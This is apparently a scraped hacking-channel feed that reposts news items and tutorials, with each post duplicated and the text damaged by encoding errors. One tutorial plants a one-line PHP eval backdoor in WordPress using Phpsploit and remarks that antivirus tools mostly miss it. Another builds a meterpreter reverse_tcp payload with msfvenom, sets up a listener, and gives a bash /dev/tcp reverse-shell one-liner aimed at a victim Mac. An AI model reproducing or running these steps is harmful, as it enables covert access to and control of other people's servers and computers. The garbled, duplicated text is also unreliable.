Forwarded from UNDERCODE NEWS
KT HoldsβCommunication Big Data Platform Road Showβ, which gathered in one place for communication big data
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Backdooring WordPress with Phpsploit:
PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
download https://github.com/nil0x42/phpsploit
When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:
<?php @eval($_SERVER[βHTTP_PHPSPL01Tβ]); ?>
The above code can be generated by running the following command:
./phpsploit --interactive --eval "backdoor"
And if we insert this little eval-code snippet into a WordPress php-file and then upload the file to VirusTotal the detection rate looks like this for the 58 different antivirus-scanners currently online virus total
ust one hit and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY
as exampleAnd should be quite easy to trigger IDS alerts at network level since PHP-code like eval and base64_decode should not be a part of a http-header. This can also of course be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.
from wpsec
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Backdooring WordPress with Phpsploit:
PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
download https://github.com/nil0x42/phpsploit
When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:
<?php @eval($_SERVER[βHTTP_PHPSPL01Tβ]); ?>
The above code can be generated by running the following command:
./phpsploit --interactive --eval "backdoor"
And if we insert this little eval-code snippet into a WordPress php-file and then upload the file to VirusTotal the detection rate looks like this for the 58 different antivirus-scanners currently online virus total
ust one hit and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY
as exampleAnd should be quite easy to trigger IDS alerts at network level since PHP-code like eval and base64_decode should not be a part of a http-header. This can also of course be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.
from wpsec
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - nil0x42/phpsploit: Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor - nil0x42/phpsploit
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Download & run nginx
1) [root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
2) [root@localhost my.Shells]# docker pull nginx //δΈθ½½nginx
Using default tag: latest
3) Trying to pull repository docker.io/library/nginx ...
latest: Pulling from docker.io/library/nginx
e7bb522d92ff: Pull complete
6edc05228666: Pull complete
cd866a17e81f: Pull complete
4) Digest: sha256:285b49d42c703fdf257d1e2422765c4ba9d3e37768d6ea83d7fe2043dad6e63d
[root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/nginx latest 3f8a4339aadd 3 weeks ago 108.5 MB
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
4) Run nginx
[root@localhost my.Shells]# docker run -p 8080:80 -d docker.io/nginx
c0462d5e18783e20f9515108fa62ab0f2ac808ea85370a7c82aee9407abf4672
[root@localhost my.Shells]# netstat -anp | grep 8080
tcp6 0 0 :::8080 :::* LISTEN 2529/docker-proxy-c
5) [root@localhost my.Shells]# docker ps //nginxε·²η»ε¨θΏθ‘δΊ
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c0462d5e1878 docker.io/nginx "nginx -g 'daemon off" 4 minutes ago Up 4 minute
6) Run results
[root@localhost my.Shells]# ./openFirewallPort.sh
---openFirewallPort.sh-------
echo "enter the port: "
read port
firewall-cmd --add-port=$port/tcp
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Download & run nginx
1) [root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
2) [root@localhost my.Shells]# docker pull nginx //δΈθ½½nginx
Using default tag: latest
3) Trying to pull repository docker.io/library/nginx ...
latest: Pulling from docker.io/library/nginx
e7bb522d92ff: Pull complete
6edc05228666: Pull complete
cd866a17e81f: Pull complete
4) Digest: sha256:285b49d42c703fdf257d1e2422765c4ba9d3e37768d6ea83d7fe2043dad6e63d
[root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/nginx latest 3f8a4339aadd 3 weeks ago 108.5 MB
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
4) Run nginx
[root@localhost my.Shells]# docker run -p 8080:80 -d docker.io/nginx
c0462d5e18783e20f9515108fa62ab0f2ac808ea85370a7c82aee9407abf4672
[root@localhost my.Shells]# netstat -anp | grep 8080
tcp6 0 0 :::8080 :::* LISTEN 2529/docker-proxy-c
5) [root@localhost my.Shells]# docker ps //nginxε·²η»ε¨θΏθ‘δΊ
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c0462d5e1878 docker.io/nginx "nginx -g 'daemon off" 4 minutes ago Up 4 minute
6) Run results
[root@localhost my.Shells]# ./openFirewallPort.sh
---openFirewallPort.sh-------
echo "enter the port: "
read port
firewall-cmd --add-port=$port/tcp
β β β Uππ»βΊπ«Δπ¬πβ β β β
Docker
Docker Hub Container Image Library | App Containerization
Welcome to the world's largest container registry built for developers and open source contributors to find, use, and share their container images. Build, push and pull.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
The US Spy Agency warns of attacks by Chinese hackers on the army, security and industry.
#CyberAttacks
#CyberAttacks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK MACOS WITH PAYLOAD-Metasploit:
1) Turn on your Kali and open a terminal.
2) Type in msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
Now the pyterpreter.py should appear in your Home folder
pyterpreter script location
3) Open a new terminal and launch Metasploit by typing in msfconsole and press Enter. We need to set up a listener so when the script is running on the Mac computer it will instantly connect back to our attack machine.
msfconsole
4) In the new terminal, type in use multi/handler and press Enter
multi handler
5) Now we need to set the PAYLOAD, the LHOST which is the attacker IP address and the LPORT which is the port we want to listen on. You can do that by executing the following commands consecutively.
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.26.130
set LPORT 4444
set payload lhost lport
6) To start up the handler, enter this command exploit -j -z
exploit
7) Now send the pyterpreter.py file to the Mac machine and execute it.
Enter the command session -i 1 and press Enter. You should now be able to interact with the Mac machine.
bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1
This command simply means "send an interactive bash session to IP address 192.168.26.130 on TCP port 4444."
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK MACOS WITH PAYLOAD-Metasploit:
1) Turn on your Kali and open a terminal.
2) Type in msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
Now the pyterpreter.py should appear in your Home folder
pyterpreter script location
3) Open a new terminal and launch Metasploit by typing in msfconsole and press Enter. We need to set up a listener so when the script is running on the Mac computer it will instantly connect back to our attack machine.
msfconsole
4) In the new terminal, type in use multi/handler and press Enter
multi handler
5) Now we need to set the PAYLOAD, the LHOST which is the attacker IP address and the LPORT which is the port we want to listen on. You can do that by executing the following commands consecutively.
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.26.130
set LPORT 4444
set payload lhost lport
6) To start up the handler, enter this command exploit -j -z
exploit
7) Now send the pyterpreter.py file to the Mac machine and execute it.
Enter the command session -i 1 and press Enter. You should now be able to interact with the Mac machine.
bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1
This command simply means "send an interactive bash session to IP address 192.168.26.130 on TCP port 4444."
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
